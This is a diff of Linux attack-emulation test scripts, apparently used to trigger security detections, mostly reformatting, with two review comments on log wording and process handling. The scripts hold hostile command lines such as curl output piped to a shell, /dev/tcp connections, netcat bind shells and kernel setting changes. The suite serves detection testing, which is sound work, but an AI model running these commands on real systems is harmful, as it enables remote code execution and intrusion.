diff --git a/rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py b/rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py
index fc823dbd5..372cb3e03 100644
--- a/rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py
+++ b/rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -21,27 +22,18 @@ metadata = RtaMetadata(
 @common.requires_os(*metadata.platforms)
 def main() -> None:
- # Path for the fake executable
+ # Path for the fake motd executable
 masquerade = "/tmp/foomatic-rip"
 source = common.get_path("bin", "netcon_exec_chain.elf")
- common.log("Creating a fake executable..")
+ common.log("Creating a fake motd executable..")
 common.copy_file(source, masquerade)
 common.log("Granting execute permissions...")
- common.execute(['chmod', '+x', masquerade])
+ common.execute(["chmod", "+x", masquerade])
- # Execute the fake executable
- common.log("Executing the fake executable..")
- commands = [
- masquerade,
- 'chain',
- '-h',
- '8.8.8.8',
- '-p',
- '53',
- '-c',
- '/tmp/foomatic-rip netcon -h 8.8.8.8 -p 53'
- ]
+ # Execute the fake motd executable
+ common.log("Executing the fake motd executable..")
+ commands = [masquerade, "chain", "-h", "8.8.8.8", "-p", "53", "-c", "/tmp/foomatic-rip netcon -h 8.8.8.8 -p 53"]
 common.execute([*commands], timeout=5, kill=True)
 # Cleanup
diff --git a/rta/linux_command_and_control_curl_wget_hidden_directory_output.py b/rta/linux_command_and_control_curl_wget_hidden_directory_output.py
index 628a43be6..87c48bc3f 100644
--- a/rta/linux_command_and_control_curl_wget_hidden_directory_output.py
+++ b/rta/linux_command_and_control_curl_wget_hidden_directory_output.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
diff --git a/rta/linux_defense_evasion_lolbin_so_load.py b/rta/linux_defense_evasion_lolbin_so_load.py
index 43c1b6195..bacfd9929 100644
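Review bot: The renamed comments and log strings in main() of linux_command_and_control_cupsd_foomatic_rip_netcon.py now say "fake motd executable", but the staged binary is `masquerade = "/tmp/foomatic-rip"` and the test is the cupsd/foomatic-rip RTA, so the wording looks copied from a different test and will mislead anyone correlating the log output with the alert. Suggest `# Path for the fake foomatic-rip executable`, `common.log("Creating a fake foomatic-rip executable..")` and `common.log("Executing the fake foomatic-rip executable..")` so the messages name the binary actually run. main() continues past the end of the hunk.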
--- a/rta/linux_defense_evasion_lolbin_so_load.py
+++ b/rta/linux_defense_evasion_lolbin_so_load.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, 'cdll.LoadLibrary.so']
+ commands = [masquerade, "cdll.LoadLibrary.so"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_process_masquerading_via_exec.py b/rta/linux_defense_evasion_process_masquerading_via_exec.py
index 2cf4ea132..6029d6872 100644
--- a/rta/linux_defense_evasion_process_masquerading_via_exec.py
+++ b/rta/linux_defense_evasion_process_masquerading_via_exec.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
diff --git a/rta/linux_defense_evasion_proxy_execution_via_crash.py b/rta/linux_defense_evasion_proxy_execution_via_crash.py
index 88b959989..860087288 100644
--- a/rta/linux_defense_evasion_proxy_execution_via_crash.py
+++ b/rta/linux_defense_evasion_proxy_execution_via_crash.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade2])
- commands = [masquerade, '-h', masquerade, '-c', 'whoami']
+ commands = [masquerade, "-h", masquerade, "-c", "whoami"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_proxy_execution_via_ld_so.py b/rta/linux_defense_evasion_proxy_execution_via_ld_so.py
index 7101a8bdf..1ce3e5340 100644
--- a/rta/linux_defense_evasion_proxy_execution_via_ld_so.py
+++ b/rta/linux_defense_evasion_proxy_execution_via_ld_so.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade2])
- commands = [masquerade, masquerade, '-c', 'whoami']
+ commands = [masquerade, masquerade, "-c", "whoami"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_proxy_execution_via_php.py b/rta/linux_defense_evasion_proxy_execution_via_php.py
index ae8214c9d..91fcc4d12 100644
--- a/rta/linux_defense_evasion_proxy_execution_via_php.py
+++ b/rta/linux_defense_evasion_proxy_execution_via_php.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade2])
- commands = [masquerade, '-r', masquerade2, '-c', 'whoami']
+ commands = [masquerade, "-r", masquerade2, "-c", "whoami"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_proxy_execution_via_pidstat.py b/rta/linux_defense_evasion_proxy_execution_via_pidstat.py
index d498e6fee..275950de9 100644
--- a/rta/linux_defense_evasion_proxy_execution_via_pidstat.py
+++ b/rta/linux_defense_evasion_proxy_execution_via_pidstat.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade2])
- commands = [masquerade, '-e', masquerade, '-c', 'whoami']
+ commands = [masquerade, "-e", masquerade, "-c", "whoami"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_proxy_execution_via_sed.py b/rta/linux_defense_evasion_proxy_execution_via_sed.py
index c0600820b..a1952e334 100644
--- a/rta/linux_defense_evasion_proxy_execution_via_sed.py
+++ b/rta/linux_defense_evasion_proxy_execution_via_sed.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade2])
- commands = [masquerade, '-n', masquerade, '-c', 'whoami']
+ commands = [masquerade, "-n", masquerade, "-c", "whoami"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_proxy_execution_via_split.py b/rta/linux_defense_evasion_proxy_execution_via_split.py
index 80f3c9e10..1bace233a 100644
--- a/rta/linux_defense_evasion_proxy_execution_via_split.py
+++ b/rta/linux_defense_evasion_proxy_execution_via_split.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade2])
- commands = [masquerade, masquerade, '--filter=foo', '-c', 'whoami']
+ commands = [masquerade, masquerade, "--filter=foo", "-c", "whoami"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_proxy_execution_via_sysctl.py b/rta/linux_defense_evasion_proxy_execution_via_sysctl.py
index 0e7cb1764..2ec2dd81d 100644
--- a/rta/linux_defense_evasion_proxy_execution_via_sysctl.py
+++ b/rta/linux_defense_evasion_proxy_execution_via_sysctl.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade2])
- commands = [masquerade, masquerade, 'kernel.core_pattern=/bin/sh -c']
+ commands = [masquerade, masquerade, "kernel.core_pattern=/bin/sh -c"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_proxy_execution_via_tcpdump.py b/rta/linux_defense_evasion_proxy_execution_via_tcpdump.py
index 5e38099bc..98c123e53 100644
--- a/rta/linux_defense_evasion_proxy_execution_via_tcpdump.py
+++ b/rta/linux_defense_evasion_proxy_execution_via_tcpdump.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-W', '-w', '-z']
+ commands = [masquerade, "-W", "-w", "-z"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py b/rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py
index 714456fa0..14bd64ad7 100644
--- a/rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py
+++ b/rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-d', 'IyEvdXNyL2Jpbi9weXRob24']
+ commands = [masquerade, "-d", "IyEvdXNyL2Jpbi9weXRob24"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_defense_evasion_sysctl_kernel_feature_activity.py b/rta/linux_defense_evasion_sysctl_kernel_feature_activity.py
index 1e94ded02..73efabed4 100644
--- a/rta/linux_defense_evasion_sysctl_kernel_feature_activity.py
+++ b/rta/linux_defense_evasion_sysctl_kernel_feature_activity.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, "--write", '/proc/sys/kernel/yama/ptrace_scope']
+ commands = [masquerade, "--write", "/proc/sys/kernel/yama/ptrace_scope"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_execution_bind_shell_via_nc_traditional.py b/rta/linux_execution_bind_shell_via_nc_traditional.py
index c9819f01b..540ada358 100644
--- a/rta/linux_execution_bind_shell_via_nc_traditional.py
+++ b/rta/linux_execution_bind_shell_via_nc_traditional.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-e', '-l', '-p', '/bin/sh']
+ commands = [masquerade, "-e", "-l", "-p", "/bin/sh"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_execution_bind_shell_via_node.py b/rta/linux_execution_bind_shell_via_node.py
index 8d53995fd..ddfe87fc7 100644
--- a/rta/linux_execution_bind_shell_via_node.py
+++ b/rta/linux_execution_bind_shell_via_node.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-e', 'spawnsh', 'listen']
+ commands = [masquerade, "-e", "spawnsh", "listen"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_execution_bind_shell_via_socket.py b/rta/linux_execution_bind_shell_via_socket.py
index b1efd687d..b85f0b234 100644
--- a/rta/linux_execution_bind_shell_via_socket.py
+++ b/rta/linux_execution_bind_shell_via_socket.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-s', '-p', 'sh']
+ commands = [masquerade, "-s", "-p", "sh"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_execution_cupsd_foomatic_rip_shell_execution.py b/rta/linux_execution_cupsd_foomatic_rip_shell_execution.py
index 8de54685b..3cd491eb2 100644
--- a/rta/linux_execution_cupsd_foomatic_rip_shell_execution.py
+++ b/rta/linux_execution_cupsd_foomatic_rip_shell_execution.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -35,7 +36,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade2])
- commands = [masquerade, masquerade2, '-c', 'whoami']
+ commands = [masquerade, masquerade2, "-c", "whoami"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py b/rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py
index 002de0010..a5158dcc0 100644
--- a/rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py
+++ b/rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
diff --git a/rta/linux_execution_gsocket_activity.py b/rta/linux_execution_gsocket_activity.py
index 09ed21467..47761fe3c 100644
--- a/rta/linux_execution_gsocket_activity.py
+++ b/rta/linux_execution_gsocket_activity.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, 'gs-netcat']
+ commands = [masquerade, "gs-netcat"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_execution_linux_powershell_outbound_network_connection.py b/rta/linux_execution_linux_powershell_outbound_network_connection.py
index 9a1a1d4e6..3ebf8bc28 100644
--- a/rta/linux_execution_linux_powershell_outbound_network_connection.py
+++ b/rta/linux_execution_linux_powershell_outbound_network_connection.py
@@ -3,8 +3,8 @@
 # 2.0; you may not use this file except in compliance with the Elastic License
 # 2.0.
-import sys
 import subprocess
+import sys
 import time
 from . import RtaMetadata, common
@@ -29,22 +29,22 @@ def main() -> None:
 network_command = "exec 3<>/dev/tcp/8.8.8.8/53"
 # Create the fake parent process script
- with open(parent_process_path, "w") as parent_script:
+ with open(parent_process_path, "w") as parent_script: # noqa: PTH123
 parent_script.write("#!/bin/bash\n")
 parent_script.write(f"{child_script_path}\n")
 # Create the child script that will make the network connection
- with open(child_script_path, "w") as child_script:
+ with open(child_script_path, "w") as child_script: # noqa: PTH123
 child_script.write("#!/bin/bash\n")
 child_script.write(f"{network_command}\n")
 # Make the scripts executable
- common.execute(['chmod', '+x', parent_process_path])
- common.execute(['chmod', '+x', child_script_path])
+ common.execute(["chmod", "+x", parent_process_path])
+ common.execute(["chmod", "+x", child_script_path])
 # Execute the parent process script
 common.log("Executing the fake parent process script")
- subprocess.Popen([parent_process_path])
+ subprocess.Popen([parent_process_path]) # noqa: S603
 # Allow some time for the network connection to be attempted
 time.sleep(5)
diff --git a/rta/linux_execution_reverse_or_bind_shell_via_utility.py b/rta/linux_execution_reverse_or_bind_shell_via_utility.py
index faaca08ec..65b3979d9 100644
--- a/rta/linux_execution_reverse_or_bind_shell_via_utility.py
+++ b/rta/linux_execution_reverse_or_bind_shell_via_utility.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-c', "socket"]
+ commands = [masquerade, "-c", "socket"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_impact_enable_write_access_to_msr.py b/rta/linux_impact_enable_write_access_to_msr.py
index 90b7df179..c46a05b56 100644
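Review bot: The `# noqa: S603` added to `subprocess.Popen([parent_process_path])` in linux_execution_linux_powershell_outbound_network_connection.py silences the lint without addressing what it points at: the Popen handle is discarded, so within this hunk nothing waits on or kills the child, and the fixed `time.sleep(5)` is the only thing bounding the run. Every other RTA in this change launches its staged binary through `common.execute([...], timeout=5, kill=True)`; if that helper's timeout/kill semantics fit here, `common.execute([parent_process_path], timeout=5, kill=True)` would replace the Popen, the sleep and the suppression in one line, otherwise keep the handle and call `proc.wait(timeout=5)` so the child is reaped. The two `# noqa: PTH123` suppressions are fine as written, though `open(parent_process_path, "w", encoding="utf-8")` would also pin the script encoding. main() starts and ends outside the hunk.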
--- a/rta/linux_impact_enable_write_access_to_msr.py
+++ b/rta/linux_impact_enable_write_access_to_msr.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, 'msr', "allow_writes=on"]
+ commands = [masquerade, "msr", "allow_writes=on"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_persistence_webserver_curl_wget_download_ip_args.py b/rta/linux_persistence_webserver_curl_wget_download_ip_args.py
index 811239ba8..7677ad8c0 100644
--- a/rta/linux_persistence_webserver_curl_wget_download_ip_args.py
+++ b/rta/linux_persistence_webserver_curl_wget_download_ip_args.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-c', 'curl http://8.8.8.8:53 --output']
+ commands = [masquerade, "-c", "curl http://8.8.8.8:53 --output"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py b/rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py
index 3b46b1631..77ad90d1c 100644
--- a/rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py
+++ b/rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-c', 'curl http://8.8.8.8:53/foo | /tmp/sh']
+ commands = [masquerade, "-c", "curl http://8.8.8.8:53/foo | /tmp/sh"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)
diff --git a/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py b/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py
index d32448ceb..9decd710e 100644
--- a/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py
+++ b/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py
@@ -4,6 +4,7 @@
 # 2.0.
 import sys
+
 from . import RtaMetadata, common
 metadata = RtaMetadata(
@@ -29,7 +30,7 @@ def main() -> None:
 common.log("Granting execute permissions...")
 common.execute(["chmod", "+x", masquerade])
- commands = [masquerade, '-c', 'curl http://8.8.8.8:53/foo > /tmp/foo && xxd']
+ commands = [masquerade, "-c", "curl http://8.8.8.8:53/foo > /tmp/foo && xxd"]
 common.execute([*commands], timeout=5, kill=True)
 common.log("Cleaning...")
 common.remove_file(masquerade)